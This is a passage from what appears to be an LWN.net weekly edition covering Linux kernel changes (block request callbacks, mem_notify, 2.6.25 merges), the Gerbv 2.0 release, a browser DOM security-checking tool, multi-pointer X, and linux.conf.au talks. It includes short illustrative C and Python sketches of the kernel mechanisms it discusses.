though, the use of the callback functionality is likely to be a sign that
the driver is being trickier than it really needs to be.
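
The callback behavior can be sketched the same way.  Again, this is a user-space model and not kernel code: struct mock_request, mock_end_request_callback(), and the two example callbacks are invented for illustration, the error argument is left out for brevity, and returning non-zero when the callback vetoes the cleanup is an assumption of this sketch.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for struct request, reduced to what the sketch needs. */
struct mock_request {
    unsigned int bytes_left;  /* data still to be transferred */
    int callback_runs;        /* how many times a driver callback ran */
    int cleaned_up;           /* set once final cleanup has been done */
};

typedef int (*mock_drv_callback)(struct mock_request *);

/*
 * Model: the callback runs only once the request is complete, and a
 * non-zero return from it suppresses the final cleanup.
 */
int mock_end_request_callback(struct mock_request *rq, unsigned int nr_bytes,
                              mock_drv_callback drv_callback)
{
    assert(rq != NULL);

    rq->bytes_left -= (nr_bytes < rq->bytes_left) ? nr_bytes : rq->bytes_left;
    if (rq->bytes_left > 0)
        return 1;   /* not complete yet, so the callback is not run */

    if (drv_callback != NULL && drv_callback(rq))
        return 1;   /* the driver asked to skip the final cleanup */

    rq->cleaned_up = 1;
    return 0;
}

/* Example callback that lets the final cleanup proceed. */
int finish_normally(struct mock_request *rq)
{
    rq->callback_runs++;
    return 0;
}

/* Example callback that holds on to the request. */
int keep_request(struct mock_request *rq)
{
    rq->callback_runs++;
    return 1;
}
```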

This change was accompanied by a fair number of patches converting all
in-tree drivers to the new interface.  The old completion functions have
been removed, so out-of-tree drivers will need updating before they will
work with 2.6.25.

		Gerbv reaches the 2.0 release milestone


Gerbv (Gerber Viewer)
is a utility for displaying CAD files that are used in the manufacture
of electronic printed circuit boards:


Gerbv is a viewer for Gerber (RS-274X) files. It is one of the utilities affiliated with the gEDA project.
Gerber files are generated from PCB CAD systems and sent to PCB manufacturers as the basis for the manufacturing process. The standard supported by gerbv is RS-274X.


In the 1980s, computer generated
Gerber files
were used to drive photo-plotter machines made by the Gerber Systems
Corporation. The photo plotters
used a mechanically stepped light source and rotating image wheels to
optically imprint an image of a circuit board onto a large piece of film.
The film was then used to manufacture the printed circuit board.
Additionally, PCB manufacturing requires information for defining the
size and placement of drill holes (drill files).

The photo plotting
machines are now obsolete, but the Gerber standard remains as a
standard in the PCB manufacturing business.  The output from Gerber
file plots can look considerably different than the original CAD drawings,
making a visualization tool like Gerbv important.


Gerbv can be used for examining the CAD files generated by
such software as
CadSoft Eagle,
a popular commercial application with a freely downloadable hobby version.
Another Linux-compatible printed circuit CAD
application is PCB.
PCB is less powerful than Eagle, but is open-source software.
LWN examined PCB
a long time ago.


Version 2.0.0 of Gerbv was recently announced:
"Gerbv release 2.0.0 represents a whole new look for gerbv.  Most
importantly, the layer control GUI has been made much more powerful through
the outstanding work of Julian Lamb.  Julian has also re-worked the GUI's
button and menus to make them more  convenient to use.  We are certain that
you  will find gerbv-2.0.0 even easier to use than before because of Julian's amazing work!"


The feature list for Gerbv 2.0.0 now includes:

 Display of RS-274x Gerber files.
 The complete implementation of the current Gerber spec.
 Display of Excellon drill files.
 Display of XYRS pick-place files for surface mount technology.
 A completely redesigned GUI.
 Controls for zoom/pan and fit to screen.
 A measure tool for making mouse-controlled distance calculations.
 User selected display of the various layers.
 Support for transparency so that multiple layers can be viewed.
 Report windows showing Gerber and drill code stats and errors.
 A built-in print button.
 Use of the Cairo graphics library, enabling export of PDF, PS, SVG, and PNG files.
 Incorporation of a new unit test suite in the code.
 Improved file-type autodetection.
 Expanded configuration options for the build system.


The project's SourceForge screenshot page gives several examples of Gerbv
2.0.0 in use.


Installation of Gerbv 2.0.0 was straightforward.  The source code was
downloaded, uncompressed and untarred.
The standard Unix configure/make/make install steps were performed
on an Ubuntu Feisty Fawn system; no problems were encountered.


Gerbv 2.0.0 was tested on some Eagle CAD files that your author
had worked on in the past.  Startup was easy: running the command
gerbv slc1.* had the desired effect of pulling in all of the
various layers for the test project.  Moving and zooming around the
layers showed the CAD graphics in detail, as expected.
The analyze tools produced a lot of useful status information for
the various files.


Details in the
copper layers that did not show up in Eagle (version 4.16) were easily
seen with Gerbv. In the past, your author has encountered problems
with Eagle incorrectly displaying the placement and scaling of text on
the silk screen layer.
This showed up when CAD files were taken to a board manufacturer.
Gerbv displayed the text as it appears on the manufacturer's system,
which is the desired behavior.


The export functions were experimented with.  Export to a png file
worked as expected.  Export to a PostScript file caused Gerbv to
hang up.  Export to a PDF file took a very long time to complete, and
gpdf took a long time to load the file.  When gpdf finished rendering,
it only displayed large polygons that were barely visible due to
their almost identical colors. Export to svg produced a
file that caused the mirage image viewer to hang when reading.
An attempt to convert the svg file to a jpg file with convert
also failed with an error.

Clearly, this is still a .0.0 release with some bugs.
Despite these problems, Gerbv 2.0.0 is a tool that is useful, if not
critical, for performing Linux-based printed circuit board design.


		Avoiding the OOM killer with mem_notify


Having applications that use up all the available memory can be a fairly
painful experience.  For Linux systems, it generally means a visit from
the out-of-memory (OOM) killer, which will try to find processes to kill.
As one would guess, coming up with rules governing which process to kill is
challenging—someone, somewhere, will always be unhappy with
a choice the OOM killer makes.  Avoiding it altogether is the goal
of the mem_notify patch.


When memory gets tight, it is quite possible that applications have memory
allocated—often caches for better performance—that they
could free.  After all, it is generally better to lose some performance
than to face the consequences of being chosen by the OOM killer.  But,
currently, there is no way for a process to know that the kernel is feeling
memory pressure.  The patch provides a way for interested
programs to monitor the /dev/mem_notify file to be notified if
memory starts to run low.

/dev/mem_notify is a character device that signals memory
pressure by becoming readable.  Interested programs can open the file and
then use poll() or select() to monitor the file
descriptor.  Alternatively, signal-driven I/O can be enabled via the
FASYNC flag and the system will deliver a SIGIO signal to the
process when the device becomes readable.  If it becomes readable, the
process should free any memory that it can afford to give up.  If enough
memory is freed this way, the kernel will have no need to call in the OOM
killer.  
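
From the application side, the poll()-based approach might look something like the sketch below.  It assumes a kernel carrying the mem_notify patch for the device itself; struct app_cache and all of the function names are hypothetical, invented for this example, and only poll(), open(), close(), and free() are real interfaces.

```c
#include <assert.h>
#include <fcntl.h>
#include <poll.h>
#include <stdlib.h>
#include <unistd.h>

/* Hypothetical application cache that can be dropped under pressure. */
struct app_cache {
    void *data;
    size_t size;
};

/*
 * Wait up to timeout_ms for fd to become readable.
 * Returns 1 if readable (pressure signalled), 0 on timeout, -1 on error.
 */
int wait_for_memory_pressure(int fd, int timeout_ms)
{
    struct pollfd pfd = { .fd = fd, .events = POLLIN };
    int ret = poll(&pfd, 1, timeout_ms);

    if (ret < 0)
        return -1;
    if (ret == 0)
        return 0;
    return (pfd.revents & POLLIN) ? 1 : -1;
}

/* Give the cache back to the system; returns the number of bytes released. */
size_t drop_cache(struct app_cache *cache)
{
    size_t freed;

    assert(cache != NULL);
    freed = cache->size;
    free(cache->data);
    cache->data = NULL;
    cache->size = 0;
    return freed;
}

/*
 * Open the notification file at path, wait once, and drop the cache if
 * pressure was signalled.  Returns the bytes freed, 0 on timeout, or -1
 * if the file could not be opened or polled.
 */
long react_to_pressure(const char *path, struct app_cache *cache,
                       int timeout_ms)
{
    long freed = 0;
    int fd = open(path, O_RDONLY);
    int state;

    if (fd < 0)
        return -1;

    state = wait_for_memory_pressure(fd, timeout_ms);
    if (state == 1)
        freed = (long)drop_cache(cache);
    else if (state < 0)
        freed = -1;

    close(fd);
    return freed;
}
```

On a patched kernel, a program would pass "/dev/mem_notify" as the path; a long-running application would more likely keep the descriptor open and add it to its existing event loop than reopen the file for each check.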

The crux of the patch is how to decide that memory pressure is occurring.
mem_notify modifies shrink_active_list() to look for movement of
an anonymous page to the inactive list, which is an indication that some
pages will likely be swapped out soon.  When that occurs,
memory_pressure_notify() (with the pressure flag set to 1) will be called
for that zone.  When the number of free pages for the zone increases above
a threshold (based on pages_high and lowmem_reserve for the zone),
memory_pressure_notify() is called again, but with the
pressure flag set to 0, effectively ending the memory pressure event for
that zone.


If there are numerous processes waiting for a memory pressure notification,
it could be counterproductive to wake them all at once—the "thundering
herd" problem.  To combat this, the patch set adds the ability to wake
fewer processes than are waiting on the poll event, by adding the
poll_wait_exclusive() function.  poll_wait_exclusive()
will in turn call add_wait_queue_exclusive() so that a
member of the wake_up() family can be used that will limit the number of processes
woken up.  Previously, only poll_wait() was available; it uses
add_wait_queue(), which does not provide this ability.
Also, to reduce the frequency of processes waking up to reclaim memory,
memory_pressure_notify() will wake them at most once every five seconds.
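
The five-second limit is a simple rate limiter.  The sketch below models the idea in user space with whole seconds; it makes no claim about how the patch tracks time internally, and struct notify_state and notify_allowed() are names invented for this illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define NOTIFY_INTERVAL_SEC 5   /* the five-second interval from the text */

/* Hypothetical bookkeeping for the rate limiter. */
struct notify_state {
    long last_notify;     /* time of the last wakeup, in seconds */
    bool ever_notified;   /* false until the first wakeup has happened */
};

/*
 * Decide whether a wakeup may be issued at time now (in seconds).
 * Records the time and returns true if allowed, false if too soon.
 */
bool notify_allowed(struct notify_state *st, long now)
{
    assert(st != NULL);

    if (st->ever_notified && now - st->last_notify < NOTIFY_INTERVAL_SEC)
        return false;

    st->last_notify = now;
    st->ever_notified = true;
    return true;
}
```

Pressure events that arrive inside the interval are simply dropped here, which keeps waiting processes from being woken repeatedly while they are still busy freeing memory.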


The /proc/zoneinfo output has been changed to include the
mem_notify status.  This can be used by a human for diagnostic purposes or
by a program to check the current status of zones for memory pressure.


The embedded community has a lot of interest in seeing this feature get
added to the kernel.  Devices like phones and PDAs are often running close
to their memory limits and the OOM killer is currently unavoidable when the
user opens yet another application.  With this patch in place, programs
that use a lot of memory, but could get by with less, can be changed to
free up their caches and the like when memory gets tight.  As memory-hungry
programs get changed, other users will
benefit as well.


The patch, submitted by Kosaki Motohiro, has been through several
iterations on linux-kernel.  The work was originally started by Marcelo
Tosatti, with the fifth version recently posted by Kosaki.  Previous
versions have been well received and with relatively few
comments on this iteration, it would seem to be getting close to being merged.


		LCA: Bruce Schneier on the two sides of security


The conference portion of linux.conf.au opened on Wednesday morning with a
keynote by Bruce Schneier.  LCA is a sold-out event; in fact, there are
rather more attendees than can be fit into the hall where the keynotes are
held.  Thus the room was packed, with the second-class citizens - those
with yellow badges who put off registration until late - watching a remote
feed in a separate room.  Those folks may have had a more distant
experience, but it was almost certainly a cooler one too.


Bruce's key point is that we need to rethink how we try to achieve
security, though it took a while to explain just why that is.  Security, he
says, has two components:


 The feeling of security: that which helps us to sleep well
     at night.

 The reality of security: whether we are, in fact, secure.


These two aspects of the problem are entirely separate from each other, but
they both have to be addressed if our security goals are to be achieved.

Security is always a set of tradeoffs which we are all making every day.
As an example, consider that, in all likelihood, nobody in the audience was
wearing a bulletproof vest.  It's not that the vests do not work; instead,
nobody feels that the cost of wearing a bulletproof vest is justified
given the risk.  On a bigger scale, the answer to the question of how to
prevent more 9/11-like attacks is clear: ban all aircraft.  In fact, that
was done in the US for a few days after those attacks, but, in the longer
term, that is not a tradeoff that people are willing to make.

So the fundamental question for any security tradeoff is: is it worth it?
As it happens, we are quite bad at making that decision.  We tend to
respond to feelings rather than reality.  Spectacular risks drive us more
than everyday risks.  We fear the strange over the familiar and the
personified (think Osama bin Laden) over the anonymous.  Involuntary risks
are seen as being bigger than those entered into voluntarily.  In the end,
evolution has equipped us quite well for making tradeoffs in the small
communities we lived in many, many thousands of years ago.  We are less
well equipped for the world we live in now.


Since we respond to feelings more than reality, there are strong economic
incentives for solutions which address feelings. The result is snake-oil
products and security theater.
Sometimes people notice that they are being 
sold bad security (later Bruce mentioned a US survey which indicated that
the Transportation Security Administration is now less trusted than the taxation
agency), but, all too often, they don't.  They have a poor understanding of
the risks and the costs involved, and there are plenty of people with
strong interests in confusing the issue.


The security market is a lemons
market, one where buyers and sellers have asymmetric access to
information.  Economic research shows that, in such markets, the bad
products tend to drive the good ones out of the market.  There is no easy
way to evaluate the work which has gone into the creation of a truly secure
product, so buyers respond to other, less reliable signals: things like
price, sales claims, or the Gartner Group.  These signals are sloppy and
prone to manipulation.  When security is outsourced to outside agencies -
governments, say - the problem gets even worse.


In the business world, information eventually brings some order to a lemons
market.  As businesses learn about what really works, access to information
evens out - though there is always a problem with very rare, high-cost
events where information is not available.  In the individual world,
though, it is much harder, because fear plays a much bigger role.


The fact of the matter is that fear is wired deeply into how we work - it
is a result of a very old part of our brain.  As humans, we have the
ability to override our fears when reason indicates that we should, but it
is a hard thing to do.  The default state is that fear rules.  So this is
Bruce's core point: the feelings matter.  All that security theater out
there is not entirely stupid; any security solution must address the fears
that people feel.  We must address both aspects of security.


The problem is where the feeling of security and the reality of security
diverge from each other.  If only feelings are addressed, security has not
really been achieved.  If only the reality of security is addressed, people
feel insecure and may make bad decisions.  Either way, the full problem has
not been solved.  Addressing this all-too-common problem is hard, though;
Bruce knows of no better way than the spreading of good information.


Your editor's perspective follows - nothing from this point on was said
during the talk.  It seems that he has a point here.  Consider some common
situations in the free software world:


 A large number of security updates from a distributor may be an
     indication that the reality of security is being achieved: problems
     are being found and fixed before they are exploited.  But all those
     updates can undermine the feeling of security.  The seemingly endless
     stream of Wireshark updates is a case in point; most of these problems
     are found through proactive auditing by the developers and have never
     been exploited by the Bad Guys.  But the feeling of insecurity
     associated with Wireshark can be strong.  This feeling can push users
     toward other software which, while not having that long history of
     security updates, is actually less secure.

 A system running SELinux may, in fact, be highly secure.  But many
     administrators still turn it off.  SELinux does not make them
     feel secure because they do not understand it, and they fear
     (rightly or wrongly) that it will interfere with the proper operation
     of the system.  But, by turning it off, they undoubtedly expose
     themselves to a number of attacks which SELinux would block.


We should hear Bruce's point and think a bit more about how we can ensure
that free software creates the feeling of security - but a feeling which is
backed up by real security.  It's a hard problem, one which lacks technical
solutions.  But we'll find ourselves less secure than we would otherwise be
if we do not address that side of the issue.

		Finding bugs lurking in the DOM


The Document Object Model (DOM) for
HTML is quite useful for handling a variety of dynamic effects for web
pages, but it is complex.  It interacts with Javascript and CSS (or they
with it) in ways
that are sometimes surprising—the DOM has often been the source of browser
bugs.  A new project, from well-known DOM  bug finder
Michal Zalewski, seeks to systematically exercise the DOM in browsers to
eliminate as many holes as it can.

 The project, with the unassuming name of DOM access checker (or
dom-checker), was just announced
on the full-disclosure mailing list (along with Bugtraq and others).
Zalewski and colleague Filipe Almeida, both of Google, describe their tool
as follows: 
 "DOM access checker is a tool designed to
automatically validate numerous aspects of domain security policy
enforcement (cross-domain DOM access, Javascript cookies, XMLHttpRequest
calls, event and transition handling) to detect common security attack or
information disclosure vectors."


The checker consists of three HTML files and a Javascript configuration
file that can be loaded from the internet via HTTP (a live version is available from
the project website) or from the local disk, using the file://
protocol.   Ideally, they should be loaded from both places and give the
same results.  The screenshot for a sample run using Firefox 3
(Fedora/3.0b3pre-0.beta2.12.nightly20080121.fc9 for the curious) is at left.


After pressing the "Click here to begin tests" button, the Javascript test
harness runs 15 major tests, each with many separate subtests.  Each
subtest reports success or failure to the screen as it runs.  Firefox 3
failed 15 of the 1500 or so checks in the standard set of tests.  


According
to the announcement, "DOM Checker had been used to find a number of
major security bypass and information disclosure problems in several
popular browsers."  Zalewski and Almeida worked with the browser
teams to resolve the most serious issues.
But common browsers will still fail up to 30 of the
less important tests, which cover privacy, rather than
security, holes.


The hope is that the browser vendors pick up these tests to use as part of
their quality assurance process.  They could also be used for regression
testing to find problems that have crept in while fixing other bugs or
adding new features.  The checker is a framework that could easily be
extended with additional tests covering other areas of DOM functionality.
With the advent of AJAX, DOM
manipulations via Javascript
are being used more and more by web sites, so tools to discover these kinds
of bugs are welcome. 


		LCA: Bringing X into a two-handed world


Our graphical interfaces, as implemented through the X Window System, are
designed around a single keyboard and a single mouse.  But humans are
social creatures who want to work together and share systems; they also
tend to design their activities around the fact that we have two hands.
Moving X out of the single-device model is not a task for the faint of
heart, but Peter Hutterer is making a go of it.  His LCA talk on
multi-pointer X was an
interesting update on where this work stands.


The X device model is based on the idea of a core keyboard and a core
pointer.  Even in a situation where multiple input devices are present (a
second mouse plugged into a laptop, say), the application still only sees a
single, core device.  There is no way to tell, using these core devices,
which physical device generated any given event.  This, of course, will be
an obstacle for any application wanting to provide multi-device support.

As it happens, the XInput extension has
provided basic 
multiple-device support  for many years.  XInput events look much like core
device events, except that (1) applications must register to receive
them separately, and (2) they include an ID number identifying the
device which generated the event.  XInput does not solve the problem by
itself, though, for a couple of reasons.  Beyond the fact that it does not
provide a way for users to specify how different devices should be handled,
XInput suffers from the little difficulty that approximately 100% of X
applications do not make use of it.  So nobody is listening to all those
nice XInput events with associated device IDs.  The one exception Peter
mentioned is the
GIMP, which uses XInput to deal with tablets.


Of course, multiple devices work on current systems; that is because the X
server also generates core events for all devices.  That causes the device
ID to be lost, but, since applications do not care, this is not a problem,
for now.  But it does mean that we are still stuck in a world where systems have
a single pointer and a single keyboard.


Luckily for us, says Peter, multi-pointer X is on the horizon.  MPX extends
X through the creation of the concept of "master" and "slave" devices.
Master devices are those which generate events seen by MPX-aware clients;
they are virtual devices which can be created and destroyed by the user at
will.  Slave devices, instead, correspond to the physical devices attached
to the system.  Through the use of a modified xinput command,
users can create masters and attach specific slaves to them.


In the MPX world, one of three things will happen whenever something is
done with a physical (slave) device:


 The X server will create an XInput event from the slave device and 
     deliver it to any applications which have asked for such events.

 If that event is not delivered (because nobody was interested), a core
     event from the associated 
     master device is created and queued for delivery.

 If the event is still undelivered, the server will create an
     XInput event from the master device to which the slave is attached and
     attempt to deliver that.


The end result is a scheme where multiple devices still work as expected
with non-MPX-aware applications.  But when an application which does take
advantage of MPX shows up, it will have access to the real information about what
the user is doing.
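
The three-step fallback described above can be written down as a short
routine.  What follows is a simplified sketch in Python rather than anything
from the X server: the deliver() function, the dictionary-based clients, and
the device names are all hypothetical, and real event delivery depends on
windows, grabs, and event masks which are ignored here.

```python
def deliver(slave, master, clients):
    """Try each event form in the order described above.

    Returns (kind, source, client_name) for the first client that has asked
    for that kind of event from that device, or None if nobody wants it.
    """
    attempts = [
        ("xinput", slave),    # 1. XInput event from the physical device
        ("core", master),     # 2. core event from the associated master
        ("xinput", master),   # 3. XInput event from the master device
    ]
    for kind, source in attempts:
        for client in clients:
            if (kind, source) in client["listens"]:
                return kind, source, client["name"]
    return None


# A client that only knows about core events, and one that has registered
# for XInput events from a specific physical mouse (both hypothetical).
legacy = {"name": "legacy-app", "listens": {("core", "master-1")}}
aware = {"name": "aware-app", "listens": {("xinput", "mouse-2")}}

print(deliver("mouse-2", "master-1", [legacy]))
# ('core', 'master-1', 'legacy-app')
print(deliver("mouse-2", "master-1", [legacy, aware]))
# ('xinput', 'mouse-2', 'aware-app')
```

The ordering is the point: an application which asks for device-level events
gets them first, while everything else continues to see ordinary core
events.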

 
Peter ran a demo of some of the things he was able to do.  By default,
there is still only one pointer and one keyboard.  Once a new master is
created, though, and slave devices attached to it, things get more
interesting.  Two mouse pointers exist on the screen, each of which can be used
independently.  It's possible to be typing into two separate windows at the
same time.  Or, with the right window manager, the user can move windows
simultaneously, or resize a window by grabbing two corners at the same
time.  It was great fun to watch.


MPX brings with it an API which can be used with multi-device
applications.  When applications use it, says Peter, the result is "eternal
happiness."  That just leaves the problem of "the other 100%" of the
application base which lacks this awareness.  To a certain extent, things
just work, even when independent pointers are used in the same
application.  There are some exceptions, though, which have required some
workarounds in the system.


For example, applications typically respond when the pointer enters a
specific window - illuminating a button within the application, for
example.  Things work fine when two pointers enter that button.  But,
likely as not, once the first pointer leaves the button, it will go dark and
refuse to respond to events from the other pointer.  The solution is to
nest enter and leave events, so that only the first entry is reported to
the application, and only the final exit.  Another problem results when a
mouse button is pushed while another button is being held down (for a drag operation,
perhaps) on a different device.  Do that within Nautilus, and the
application simply locks up - not the eternal happiness Peter was hoping
for.  So, when the application holds a grab on one 
device (as happens when buttons are held down), no other button events will
be reported.  Also problematic is what to do when the application asks
where the pointer is: which pointer should be reported?  In this case, the
server simply assigns one pointer as the one to report on.  All of this
makes standard applications work - almost all the time.
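
The nesting of enter and leave events described above amounts to keeping
track of which pointers are inside each window.  Here is a minimal sketch in
Python, assuming nothing about how the server actually implements it; the
EnterLeaveNester class and its method names are hypothetical.

```python
class EnterLeaveNester:
    """Report only the first entry into a window and the final exit from it."""

    def __init__(self):
        self.inside = {}   # window -> set of pointers currently inside it

    def enter(self, window, pointer):
        """Return True if an enter event should be reported to the application."""
        pointers = self.inside.setdefault(window, set())
        if pointer in pointers:
            return False           # already inside; nothing new to report
        first = not pointers       # True only when the window was empty
        pointers.add(pointer)
        return first

    def leave(self, window, pointer):
        """Return True if a leave event should be reported to the application."""
        pointers = self.inside.get(window)
        if not pointers or pointer not in pointers:
            return False           # this pointer was never inside
        pointers.remove(pointer)
        return not pointers        # True only when the last pointer has left


nester = EnterLeaveNester()
print(nester.enter("button", "pointer-1"))   # True:  first entry is reported
print(nester.enter("button", "pointer-2"))   # False: nested entry is hidden
print(nester.leave("button", "pointer-1"))   # False: one pointer remains
print(nester.leave("button", "pointer-2"))   # True:  final exit is reported
```

With this bookkeeping, the button in the example stays illuminated until the
last pointer has left it.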


Some interesting problems remain, though.  How, for example, should a
window manager place new windows in a multi-user, multi-device situation?
Users will want their windows in their part of the display space, but the
window manager has no real way of knowing where that is - or even which
user the window "belongs" to.  In general, the
whole paradigm under which desktop applications have been developed is
unprepared to deal with a multi-device world.


Things will get worse as more types of input devices enter the picture.
Touch screens are bad enough; they have no persistent state, so things
change every time the user touches the device.  But touch screens of the
future will report multiple touch points simultaneously, and each of those
will have attributes like the area of the touch, the pressure being
applied, etc.  Perhaps the device will sense elevation - a third dimension
above the device itself.  

All of this is going to require a massive rethinking of how our
applications work.  There are going to be a lot of big problems.  But that,
says Peter, is what happens when one explores new areas.  One gets the
sense that he is looking forward to the challenge.

		LCA: Disintermediating distributions


One of the mini-confs which happened ahead of linux.conf.au proper was the
"distribution summit," meant to be a place where representatives and users
of all distributions could talk about issues of interest to all.  The
highlight of this event, perhaps, was Jeff Waugh's talk on
disintermediating distributions - or, as he rephrased it, "distributed
distributions."  If his ideas take hold, they could be the beginning of a
new relationship between free software projects and their users.


It all started, says Jeff, some years ago, when he ran into Mark
Shuttleworth fresh from a visit to Antarctica.  Mark's pitch, says Jeff,
"sounded like crack" at the time.  By 2003 or so, it just didn't seem like
there was a whole lot of room for a new distribution.  But Mark had some
interesting ideas, and Jeff signed on; the result, of course, was Ubuntu.


Ubuntu has clearly had some success, but, in some important ways, it has
failed to work out - at least for Jeff.  He found himself distracted by Ubuntu's lack of
participation in Debian, from which it derived its product.  There was
a real tension between tracking Debian and tracking upstream projects
more directly.  Despite Jeff's insistence that Ubuntu should be tracking
(and pushing updates into) Debian's unstable distribution, Ubuntu often
chose to go with upstream, resulting in what is, in effect, a fork of the
Debian distribution - in terms of both the technology and the community.


What Ubuntu was doing was taking upstream packages, modifying them,
bringing in shiny new features, and generally looking for ways to
differentiate itself from the other distributors.  So, for example, the
first Ubuntu release contained a great deal of Project Utopia work (aimed
at making hardware "just work" with Linux) which had been done by
developers from other distributions; Ubuntu shipped it first, though, and
got a lot of credit for it.  Novell's behind-closed-doors development of
Xgl was motivated primarily by the wish to keep Ubuntu from shipping it
first.  Meanwhile, Red Hat had slowly learned that trying to differentiate
itself by diverging from upstream was a path to pain.  So Red Hat's
developers created AIGLX,
in an open, community-oriented manner; the result is that AIGLX has proved
to be the winning technology.


Events like these led Jeff to wonder about just where the integration
of packages should be done - upstream or downstream?  From Jeff's
(GNOME-based) upstream point of view, he wonders why he doesn't have a
direct relationship with his users.  While most projects deliver their code
through middlemen (distributors), there is an example of a project which
has managed to maintain a much more direct relationship: Firefox.  Most
Firefox users are direct clients of the project - though most of them are
Windows users.  The Firefox trademark has been used to ensure that, even
when distributors are involved, the upstream developers get a say in what
is delivered to users.


So, what happens if you take out the middleman?  It's instructive to look
back at what life was like before there were distributors.  It was, Jeff
says, much like pigs playing in mud; perhaps they enjoyed it, but it was
messy.  There are, in fact, a lot of good things that distributors have
done for us.  You can get a fully integrated stack of software from one
source, and the distributor acts, in a way, as the user's advocate toward
the upstream project.  We don't want to lose out on all that.


But, if one were to look at facilitating a more direct relationship between
development projects and their users, one would want to take advantage of a
number of maturing technologies.  These include:


 OpenID.  Any process of distributing distributions must look at
     distributed identity, and OpenID is the way to do it.

 DOAP.  "Sounds terrible" but it's a useful way of describing a project
     with XML.  With a DOAP description, a user can find a project's
     mailing lists, bug tracker, source repository, etc.

 Atom.  This is how projects can distribute information about what they
     are doing.

 XMPP.  This is a Jabber-based message queueing and presence protocol.
     It can be used for more active publishing of information than Atom can
     do.

 Distributed revision control.  Lots of functionality for integration
     between projects, and between upstream and downstream.  Jeff sees git
     as a step backward, though; some
     of the other offerings, he thinks, have much better user interfaces.


Also important are the packaging efforts which are underway in a
number of places.  These include Fedora, which is "becoming competitive
with Debian" as a community project.  OpenSUSE has put together a build
system which can create packages for a number of distributions.  Debian has
had a community build system for years; there is interest in Debian in
going the next step, though - ideas like building packages directly from a
distributed version control system.  Ubuntu's Launchpad was "a spectacular
vision," though the reality is "a bit of a snore"; it didn't achieve its
goal of helping upstream and downstream work together.


Then there's Bugzilla, which is the "bug filing gauntlet" between projects
and their users.  The Debian bug tracking system has done a better job of
facilitating bug reports by
allowing them to be submitted by email.  But most big projects are
using Bugzilla.  It would be much improved by using OpenID (so that users
would not have to register to file bugs) and some sort of Atom-based feed
which would make querying bugs easy.


If you take out the distribution, what do you replace it with?  How do we
achieve consistency?  We need to create standards for how we interact with
each other.  And we can, in fact, be very good at consistency and standards
when the need 
is clear.  Good release management is a step toward that goal.  GNOME once
had very bad release management, but has pulled it together.  Doing
time-based releases was a hard sell, but few developers would want anything
else now.  Now GNOME release management just works.


Consistency in source management is needed.  Once upon a time that was done
through CVS, but CVS is no longer up to the job, and now every project is using
a different distributed version control system.  But, sooner or later, one
of the competing projects will win out and "hopefully we'll have clarity
again."  Autotools and pkg-config can also go a long way toward creating
consistency between projects.


So, if we can push the available tools up into the upstream projects, those
projects can get better at producing packages for distributions themselves.
Once the tools (like bug trackers) can talk to each other, people will
start making more use of them and network effects will take over.  But, at
the moment, the knowledge about integration remains at the distribution
level.  

Debian, Jeff thinks, is well placed to take on a project like this
and push its integration knowledge upstream.  While Debian has typically
been ten years ahead of everybody else in its packaging and integration
abilities, it currently has a "relevancy problem."  Finding ways to help
upstream projects support their users more directly while maintaining
overall integration and consistency would be a perfect way for Debian to
maintain its leadership in this area.  That could change the game
for everybody, bringing projects closer to their users and making us all
"happy as pigs in mud."

		More stuff for 2.6.25


Since last week's
installment, some 3800 changesets have been merged into the mainline
git repository.  Some of the more interesting user-visible changes found in
that patch stream include:


 Support for new hardware, including RDC R-321x system-on-chip
     processors, Onkyo SE-90PCI and SE-200PCI sound devices, Xilinx ML403
     AC97 controllers, TI TLV320AIC3X audio codecs, Realtek
     ALC889/ALC267/ALC269 codecs, VIA VT1708B HD audio codecs, SiS 7019
     Audio Accelerator devices, C-Media 8788 (Oxygen) audio chipsets, Asus
     AV200-based sound cards, Freescale MPC8610 audio devices, Audiotrak
     Prodigy 7.1 HiFi audio devices, Conexant 5051 audio codecs,
     MediaTek/TempoTec HiFier Fantasia sound cards, wireless RNDIS devices
     (and Broadcom 4320-based devices in particular), USB printer gadgets
     (intended for use in printer firmware), 
     and NetEffect 1/10Gb ethernet adapters.

 The nearly-unused ALSA sequencer instrument layer has been removed.

 SELinux has a new set of checks which allow the creation of policies
     which control the flow of packets into and out of the system.

 Netfilter has a more flexible "hashlimit" mechanism for limiting the
     number of packets to/from a given source over time.

 There is a new "flow" classifier for the network fair queueing code
     which allows the more flexible creation of traffic policies.

 The futex mechanism has a new "bitset wait" mechanism which allows for
     more targeted wakeups.  This feature will be used by glibc to
     implement optimized reader-writer locks.

 PCI hotplug is no longer an experimental feature.

 Support for PCI Express ASPM, a power management protocol, has been
     added.  

 The virtio "balloon" driver (which can be used to change the amount of
     memory used by a KVM guest) and PCI driver have been added.

 The CLONE_STOPPED bit (for the clone() system call)
     is said to be unused and is planned for removal.  For 2.6.25, a
     warning will be printed.

 The timerfd() system call is back, with a reworked, more capable
     API. 

 The page map patches,
     which enable much better accounting of memory use by processes, have
     been merged.

 The "PM QOS" infrastructure allows both kernel and user-space code to
     register quality-of-service requirements (in the form of CPU DMA
     latency, network latency, and network throughput).  These requirements
     will be taken into account when the kernel considers putting the
     system into a lower-power state.

 Per-process capability bounding sets (which permanently remove
     potential capabilities from a process) are now supported.  64-bit
     capability mask support has also been merged.

 The simplified mandatory
     access control kernel (SMACK) security module has been merged.

 The smbfs filesystem has (finally) been deprecated in favor of CIFS.
     It is now scheduled for removal in 2.6.27.

 There is a new RPC transport module allowing (client) NFS mounts using
     RDMA.
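
To make the futex "bitset wait" item from the list above more concrete: each
waiter supplies a bit mask when it goes to sleep, and a wakeup carries a mask
of its own; only waiters whose mask shares at least one bit with the wakeup
mask are candidates for being woken.  The following is a user-space model of
that matching rule in Python, not the kernel code; the BitsetWaitQueue class
and the READER and WRITER bits are hypothetical names chosen to show how a
reader-writer lock might use the feature.

```python
READER = 0x1   # hypothetical bit used by waiting readers
WRITER = 0x2   # hypothetical bit used by waiting writers


class BitsetWaitQueue:
    """Toy model of waiters that are woken only by a matching bit mask."""

    def __init__(self):
        self.waiters = []   # (name, bitset) pairs in arrival order

    def wait(self, name, bitset):
        if bitset == 0:
            raise ValueError("bitset must be nonzero")
        self.waiters.append((name, bitset))

    def wake(self, bitset, max_wake=1):
        """Wake up to max_wake waiters whose mask overlaps `bitset`."""
        woken, remaining = [], []
        for name, mask in self.waiters:
            if len(woken) < max_wake and mask & bitset:
                woken.append(name)
            else:
                remaining.append((name, mask))
        self.waiters = remaining
        return woken


queue = BitsetWaitQueue()
queue.wait("reader-1", READER)
queue.wait("writer-1", WRITER)
queue.wait("reader-2", READER)

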